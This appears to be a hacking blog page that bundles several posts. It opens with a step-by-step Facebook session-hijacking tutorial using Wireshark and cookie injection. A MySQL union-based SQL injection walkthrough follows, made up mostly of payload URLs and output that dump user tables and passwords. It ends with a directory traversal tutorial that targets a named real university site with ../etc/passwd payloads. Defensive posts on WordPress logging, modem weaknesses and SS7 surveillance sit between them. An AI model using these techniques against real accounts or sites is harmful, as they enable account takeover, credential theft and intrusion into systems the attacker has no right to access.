HACK FACEBOOK BY COOKIE STEALING ENJOy.. (Adesh kolte )

HACK FACEBOOK BY COOKIE STEALING
ENJOy..

Three days ago I finished the series on Gmail Session Hijacking and Cookie Stealing , due to a tremendous response of readers I planned to write a post on Facebook cookie stealing and Session hijacking. Facebook session hijacking can also be accomplished via a very popular tool called Firesheep(On a Wifi Network Only), which I won’t be explaining here because I have already written it before in my post Facebook Hacking Made Easy With Firesheep
In this tutorial I will explain you how an attacker can capture your authentication cookies on a local area network and use them to hack your facebook account, Before reading this tutorial I would recommend you to part1, part2 and part 3 of my Gmail Session Hijacking and Cookie stealing series, So you could have better understanding of what I am doing here.
Gmail Cookie Stealing And Session Hijacking Part 1
Gmail Cookie Stealing And Session Hijacking Part 2
Gmail Cookie Stealing And Session Hijacking Part 3
Facebook Authentication Cookies

The cookie which facebook uses to authenticate it’s users is called “Datr”, If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

How To Steal Facebook Session Cookies And Hijack An Account?

An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.

If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.

In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.

Step 1 – First of all download wireshark from the official website and install it.

Step 2 – Next open up wireshark click on analyze and then click on interfaces.

Step 3 – Next choose the appropriate interface and click on start.

Step 4 – Continue sniffing for around 10 minutes.

Step 5 – After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.

Step 6 – Next set the filter to http.cookie contains “datr” at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.

Step 7 – Next right click on it and goto Copy – Bytes – Printable Text only.

Step 7 – Next right click on it and goto Copy – Bytes – Printable Text only.

Step 8 – Next you’ll want to open up firefox. You’ll need both Greasemonkey and the cookieinjector script. Now open up Facebook.comand make sure that you are not logged in.

Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.

Step 10 – Now refresh your page and viola you are logged in to the victims facebook account.
Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.

Advertisements

Understanding This Technique Called MySQL Injection

ABSTRACT

It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity.
Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pros software’s for analysis and farredura vulnerabilities were unimproved by us.

Understand the technique MySQL Injection

One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application.

STEP BY STEP

Figure 1) Detecting.

Searching Column number (s): We will test earlier in error, then no error may be said to find.

Figure 2) SQL error.

Host Information,
Version of MySQL system used on the server.

Figure 3) Host Information.


Figure 4) Location of the files

Current database connection used between the “input” to the MySQL system.

Figure 5) Users of MySQL.

Figure 6) Current Time.

Brute Force or Shooting

This happens in versions below 5.x.y

Figure 7) Testing.

 
Dump
This happens in versions up 5.x.y [ 1º Method ] 
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) frominformation_schema.tables where table_schema=database()–

usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column ‘usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you’ at line 1

<>————————<>————————-<>————————–<>

[ 2º Method ]

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) frominformation_schema.tables limit 0,1–
CHARACTER_SETS
or
Unknown column ‘CHARACTER_SETS’ in ‘where clause’
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘CHARACTER_SETS’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) frominformation_schema.tables limit 1,2–
COLLATIONS
or
Unknown column ‘COLLATIONS’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘COLLATIONS’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) frominformation_schema.tables limit 16,17–
usuarios
or
Unknown column ‘usuarios’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘usuarios’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18–
rafael
or
Unknown column ‘rafael’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael’ at line 1
—————————————————————————————————————————————————————————————————————————————-

Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,nome from usuarios–
Unknown column ‘rafael1’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael1’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,churros from usuarios–
Unknown column ‘rafael1’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael1’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,login from usuarios–
_Rafa_
or
Unknown column ‘_Rafa_’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_Rafa_’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios–
rafael1337
or
Unknown column ‘rafael1337’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael1337’ at line 1

=————————–=————————–=————————–=————————–=

Dump
This happens in versions up 5.x.y [ 1º Method ] 

“usuarios” hexadecimal -> “7573756172696f73”

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) frominformation_schema.columns where table_name=0x7573756172696f73–
login,passwd,id,texto
or
Unknown column ‘login,passwd,id,texto’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘login,passwd,id,texto’ at line 1

<>————————<>————————-<>————————–<>

[ 2º Method ]

“usuarios” decimal -> “117,115,117,97,114,105,111,115”

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) frominformation_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 0,1–
login
or
Unknown column ‘login’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘login’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) frominformation_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 1,2–
passwd
or
Unknown column ‘passwd’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘passwd’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) frominformation_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 2,3–
id
or
Unknown column ‘id’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘id’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) frominformation_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 3,4–
text
or
Unknown column ‘text’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘text’ at line 1
—————————————————————————————————————————————————————————————————————————————-

Extracting data from the columns of a given table

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) fromusuarios–
_Rafa_ : fontes1337
or
Unknown column ‘_Rafa_ : fontes1337’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_Rafa_ : fontes1337’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios–
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column ‘_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select
1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios–
_RHA_ : infosec1337
or
Unknown column ‘_RHA_ : infosec1337‘ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_RHA_ : infosec1337’ at line 1

=————————–=

Concat 

group_concat() => Search all you want with ascii caracters
concat() => search what you want with ascii caracters
concat_ws() => unite

Hexadecimal 

0x3a => :
0x20 => space
0x2d => –
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researchs and developers to beware and test your code.

CONCLUSION

Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?
The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.
The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.

Hardening Wordpress Security By Monitoring Malicious User Activities

WordPress has become the most popular content management system; it drives more than 20% of the websites on the internet. Such popularity has also made WordPress a very popular hacker target, and as a matter of fact one can find ample of information about WordPress security. But although there is a lot of information about WordPress security, the WordPress security community is missing out something very important; WordPress monitoring and logging!

Why Logging and Monitoring is Important

Operating systems, network hardware and software have got log everything that is happening in a lo file or some sort of auditing database. For example Windows has the Event Viewer and Linux / Unix operating systems use syslog.

From time to time administrators analyse logs to ensure that everything is working properly and that everyone is playing by the rules, i.e. not trying to tamper the system. In fact Analysing logs helps administrators identify any suspicious behaviour, hence preventing malicious attacks.

Even in case of an attack, logs come in handy. For example if a website or server is hacked, administrators analyse the logs to track back the attack and identify the security hole the malicious hacker exploited to hack the website or server. Once the security hole has been identified administrators can work with the development team or vendor to close down the security hole to ensure that it cannot be exploited again in the future.

Management also find logs very handy because it allows them to track and monitory user activity and productivity. Monitoring of system and user activity is a must to ensure both user productivity and the security of the system.

Monitor WordPress Sites Activity

Like with any other system, keeping an audit log of the activity WordPress sites and blogs, especially WordPress multisite installations is a must if you want to ensure the security of WordPress, and also user productivity.

WP Security Audit Log

WP Security Audit Log is a free WordPress monitoring plugin that tracks all activity on WordPress and WordPress multisite websites thus enabling administrators and WordPress owners keep track of all that is happening on their WordPress to identify any suspicious behaviour and prevent malicious hack attacks.

WP Security Audit Log logs an alert each time a user logs in or out and creates, modifies or deletes existing content such as blog posts, pages and custom post types. What makes WP Security Audit Log better than other monitoring and auditing plugin are its comprehensive WordPress alerts. For example if some content is changed it does not simply issue a generic “content has been modified” alert, but specifically reports what has changed. For example it raises a different alert if a URL or category has changed, if the blog status or visibility has changed, if the author, date, page template or parent has changed and much more.

Apart from content activity it also monitors the WordPress installation and system. Below is a list of some of the activity that WP Security Audit Log monitors:

  • User profile changes; such as email, role and password changes
  • Widgets changes; for example an alert is generated if new widget is created, existing widgets are moved, modified or deleted
  • Plugin changes; an alert is generated if a new plugin is installed or if an existing one has been updated or uninstalled
  • Themes monitoring; new theme is installed or activated
  • WordPress system changes; WP Security Audit Log also monitors WordPress updates, permalinks changes, administrator notification email change, default user role etc
  • Source code changes; an alert is raised if plugin or theme files is modified

Administrators can use the Audit Log Viewer, shown in the below screenshot to view all the WordPress security alerts generated by the plugin while monitoring WordPress.

 

Detailed WordPress Alerts

As per the below screenshot each WordPress alert generated by the plugin includes information about the actual change being reported, the user’s WordPress username, avatar and role, the source IP, the date and time.

It is also possible to enable the Data Inspector from the plugin’s settings to get more details about the reported alert, such as the file triggering the alert, the user’s User Agent string etc.

From the plugin settings administrators can also enable PHP alerts, so the plugin reports any PHP errors and warnings therefore enabling administrators to also keep track of any PHP problems, typically created when a WordPress website is hacked.

It is also possible to disable any of the alerts, if for example you do not want to be alerted each time a user logs in or out, as seen in the below screenshot.

 

Delegation of WordPress Security Monitoring

By default only administrators can view the alerts, switch on or off alerts, modify alerts pruning etc. Though it is also possible to allow specific users or roles to view the alerts or modify any of the plugin settings as seen from the below screenshot.

 

WordPress Administrators Should Use WP Security Audit Log

It is impossible to track user activity and productivity, and to ensure the security of your WordPress unless you have WP Security Audit Log; therefore such plugin come in very handy especially if you have hundreds of users on your WordPress, or if you have multiple websites and a large number of users on a WordPress multisite installation.

Download WP Security Audit Log from the Official WordPress plugin repository and visit theofficial WP Security audit Log plugin page for more information about the plugin

Common Attacks Against Modems by (Adesh kolte HaXor)

0x01: Introduction to Modems

The term DSL modem is technically used to describe “a modem which connects to a single computer, through a USB port or is installed in a computer PCI slot”. The more common DSL router which combines the function of a DSL modem and a home router is a standalone device which could be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called as a “residential gateway”, a DSL router usually manages the connection and sharing of the DSL service in a home or small office network.

Most consumer DSL lines use one of several variations and varieties of Asymmetric DSL (ADSL). The “asymmetric” DSL here means that more of the bandwidth of the line is dedicated to downstream (download) data than upstream (upload) data. Hence, download rates are faster than upload rates since most users download much larger quantities of data than they actually upload. Because the telephone lines were never designed to carry such high frequency signals, DSL is distance-sensitive. The farther away from the switching center the modem is, the longer the telephone wires, the weaker the signal, and the lower the data rate that the modem can achieve. Users in metropolitan areas, close to switching centers, may have access to higher rate service, up to 8 Mbit/s than the expected rate for the same service in remote areas.

Reference: en.wikipedia.org/wiki/DSL_modem

0x02: Market Share

The modem manufacturers mostly are mostly chinese based . Research shows that companies like ZTE & Huawei are doing very well and have gained enterprise router share in china over the past year. In China ZTE is placed third player in 2013 and 2014 with dizzying rise this year than the popular consortium Cisco. (Which happens to be more secure). This is also due to the fact that cisco’s products are very costly and difficult for the home users to afford.

 

0x03: Backups& Backdoors

All modems include  Backup files mainly because of the need to recover the modem to the original state after a reset. However, knowing the direct link to the backup file puts the modem directly in danger. All an attacker has to do is request the backup file and view it; mostly this is juicy plain info that contains passwords, ISP configurations.

Knowing this however, some vendors try to encrypt the contents that are inside these files. So downloading this would be useless for the attacker. But this isn’t entirely impossible as lots of vendors tend to use weak encryption mechanisms to encrypt backup file. And research done by white hats such as Osanda Malith shows that. He for example provided a PoC tool used to decrypt these rom-0 (Backup) files from most modems, including ZTE and TP-Link.
Most of the chinese Vendors such as ZTE are banned from the US, one because they being incredibly insecure and two because, they put malicious backdoors to snoop and eavesdrop on individuals and organizations.

Lots of trusted companies such as TP-Link, Huawei and other chinese companies have a record of placing backdoors in their products. These backdoors are normally in form of open ports which on connecting would provide a reverse shell. The ports are often found to be high in number to make it harder to detect.

One of such examples can be found here. This lets them capture sensitive files and sometimes sell it for residing countries. This strategy is great one for governments to spy on their citizens as well as for great as a part of a cyber attack against a particular country. So for example: A country could sell cheap  backdoored modems to a target country, and in case the modems end up being used on military and sensitive systems, then they have hit a jackpot.

0x04: Default Configuration details and Hardcoded Credentials

Apparently, all if not most modems come with very easy to guess password configurations. Infact, most of them are identical like: username:admin and password: admin. Most people do not change the configuration details and most ISP’s leave this as default.

This amazingly is a good news for malicious users. Because all they have to do is know the vendor and they can get their hands on it easily using sites such as http://www.routerpasswords.com/ to extract information.

0x05: XSRF and XSS

These two are two of the most common flaws in the history of web security. Mmost ZTE modems do not use anti-XSRF tokens (Used to prevent CSRF Attacks) on any sensitive request.

XSS is even more worsed because if one found an XSS flaw in any modem (which is likely), he can send that link to a logged in administrator and perform any action in behalf of the admin, this could be done by stealing the XSRF-Token. Also, an XSS could also allow session hijacking and other browser attacks.

XSRF flaws are more commonly found in modems as opposed to xss due to the fact that modems use HTTP authentications most of the time. So Headers are mainly used in communications protocols to communicate with one another. This makes it harder for the modem to detect and create anti-csrf tokens other than to compare it.

Because of these or just because of careless developing it is sometimes possible in to tricking admins changing passwords, issuing commands or easing access.

0x06: Social Engineering

What would you say if a blocked number called you and told you that she is from your ISP and she needs your credentials in order to add/maintain the new and revised 3G technology into your modem. Or even she asks you to maintain security flaws in your modem? You surly never expect this to be a troll. I mean, why would you? And then next thing you know, she snooped your configuration password. Knowing this password could mean (since lots of people use same passwords) that she got access to email password, financial account, etc.

0x07: Exploit Databases

Many Exploit databases hold juicy info about modems. Including default configurations, XSRF/XSS/LFI flaws, logical issues, backdoors. So all you need to do is to find the modem version and give a search on exploit databases such as exploit-db.com, 1337day.com etc

So say, in case you found an exploit against a previous version of a modem, however not for the exact version. This necessary doesn’t mean yours isn’t vulnerable to the particular exploit you found. Infact most vendors use same architecture to construct the web architecture of their modems. So one XSS on one model could mean XSS on all other vendor modems.

0x08: Eavesdropping

The lack of SSL usually means bad luck for modems. Especially if it’s for office/public usage because the admin is always in risk of accessing any file from the modem. The reason being, that it is very easy to sniff ongoing traffic with with tools like Wireshark.

The fact that modems use login protocols like HTTP authentication puts them in more danger because when requesting any file, the modem should request the authentication header and the admin responds in (mostly Base64 form), and an attack easily can sniff this and decode the communication easily it.

Even when using SSL (note very few modems use it), it can still be insecure and even pose more risk. Recently, A lot of attacks have been identified against SSL protocols Heartbleed, POODLE to name a few.

0x09: Denial Of Service

Denial of Service is one of the most annoying things I can think of next to a Log out CSRF. People with bad intentions can use this type of attack to knock a modem out of delivering internet and sometimes even let the modem reset itself.

This is really crazy for people trying to do their job. The fact this attack can easily be turned an untraceable attack can make your business day a big pain just because you choose to use a vulnerable modem.

Most modems by design don’t hold more HDD than 25MB and less than 2MB ram with no DOS protections. This usually means they can handle limited amount of data with huge amount of time. All an attacker has to do is send more requests than the modem can handle and hence exhausting it’s memory and resulting in a DOS.

0x10: Lack Of Updates

Modem users seldom receive updates for modems in case a critical vulnerabilities have been identified in the wild, and a lot of them don’t really have a mechanism for providing OTA (Over the Air) updates. A lot of times, users manually have to upgrade the firmware and ofcourse which is not possible for people having lack or no technical knowledge.

0xA: Suggestions

  1. If you are an admin/user of a modem, Try not to stay logged in to make attacks like XSRF,XSS and ClickJacking less effective. .
  2. Try doing a little research about the modem model you are trying to buy. Google exploits for it, try to search if it uses secure connection (TLS), if it is vulnerable, why should you. Look for another.
  3. Try disabling remote access to decrease the attacker’s possibility of gaining access over the internet; since most of the modem exploits require LAN access, it’s a good thing to disable Telnet, web and even ftp access to modem remotely.
  4. Limit Physical Access. Because, most modems have a physical hard reset key/button, it should be noted most of them should remain in a secured environment where only authorized people can reach.

Tapping Into Mobile Networks’ Backbone.

Hackers are known to use all sort of remote access tools to infiltrate into cell-phones, often by discovering vulnerabilities in an operating system platform like Android,Symbian, or even SIM cards.
It’s more seldom to try and tap into the network infrastructure that routes the calls for mobile operators themselves,However, new research indicates that one vile kind of network wiretapping is happening too, across the Globe.

Across a range of operators, 0.07% of SS7 packets being routed across a network in Africa were deemed wary. ,Asia the rate was 0.05% and the Americas it was 0.026%, according to Dublin based research firm Adaptive Mobile. While these are low percentages they give an account to the millions of SS7 packets being routed every day.

Location tracking is for now the most popular reason for exploiting the SS7 protocol, A survey of a handful of large mobile operators on each continent showed that hackers have been (ab)using a vital signalling protocol for routing cellular calls known as SS7, to track the locale of certain mobile users and in some cases, listen in on calls.

Some network surveillance groups like those based in Bulgaria and the Rayzone group, also acts within the grey area of selling access to their SS7 exploitation platforms to governments and other surveillance companies like Hacking Team.

The SS7 networks is the foundation of how carrier operators work and billions of dollars have been invested in network architecture around the world.

Protect A Website From Being Defaced Or Hacked

A website defacement occurs when the hacker changes the visual appearance of a website, usually replaces the website’s index.html file with his own file, which may contain the hacker’s message or any thing related to it.

There are many techniques that can be used to deface a website, However one of the most common technique used for defacement is simple SQL Injection, which allows the hacker to gain administrative access to the website. Some times the hacker may manage to gain root access to the webserver and therefore may cause a Mass defacement, replacing the index files of all the website available on that particular servers. This may be difficult when done manually, however there are many scripts that automatically do it.

If you are a webmaster and looking forward to protect your website from being defaced or hacked you are in the right place. AntiDef is a tool written in java, specially designed for the purpose of protecting a website from being defaced or hacked.  The usage is quite simple, all the server manager should do is to run this application with the following parameters:

  • Path to the copy of the website(source).
  • Path to the application directory.
  • Path to log directory.

How Does This Tool Work?

The tool compares the source and the destination files, if they are found to be different it replaces the files with the backup or original files

Hack a website using Directory Transversal attack?

What is root directory of web server ?

It is a specific directory on server in which the web contents are placed and can be seen by website visitors. The directories other that root may contain any sensitive data which administrator do not want visitors to see. Everything accessible by visitor on a website is  placed in root directory. The visitor can not step out of root directory.

what does ../ or ..\ (dot dot slash) mean  ?

The ..\ instructs the system to go one directory up. For example, we are at this location C:\xx\yy\zz. On typing ..\ , we would reach at C:\xx\yy.

Again on typing ..\ , we would rech at C:\xx .

Lets again go at location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is to directory xx) where abc.txt is placed.

Note : Its ..\ on windows and ../ on UNIX like operating syatem.

What is Directory Transversel attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

The goal of this attack is  to access sensitive files placed on web server by stepping out of the root directory using dot dot slash .

The following example will make clear everything

Visit this website vulnerable to directory transversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This webserver is running on UNIX like operating system. There is a directory ‘etc’ on unix/linux which contains configration files of programs that run on system. Some of the files are passwd,shadow,profile,sbin  placed in ‘etc’ directory.

The file etc/passwd contain the login names of users and even passwords too.

Lets try to access this file on webserver by stepping out of the root directory. Carefully See the position of directories placed on the webserver.

We do not know the actual names and contents of directories except ‘etc’ which is default name , So I have
marked them as A,B,C,E or whatever.

We are in directory in F accessing the webpages of website.


Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search the directory ‘etc’ in F. But obviously, there is nothing like this in F, so it will return nothing

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd

Now this will step up one directory (to directory E ) and look for ‘etc’ but again it will return nothing.

Now type 

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D ) and look for ‘etc’ but again it will return nothing.

So by proceeding like this, we we go for this URL

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to ‘etc‘ directory and show us contents of ‘passwd‘ file.
To understand the contents of ‘passwd’ file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format

You can also view etc/profile ,etc/services and many others files like backup files which may contain sensitive data. Some files like etc/shadow may be not be accessible because they are accesible only by privileged users.

Note- If proc/self/environ would be accessible, you might upload a shell on server which is called as Local File Inclusion.

Counter Measures

1. Use the latest web server software
2. Effectively filter the user’s input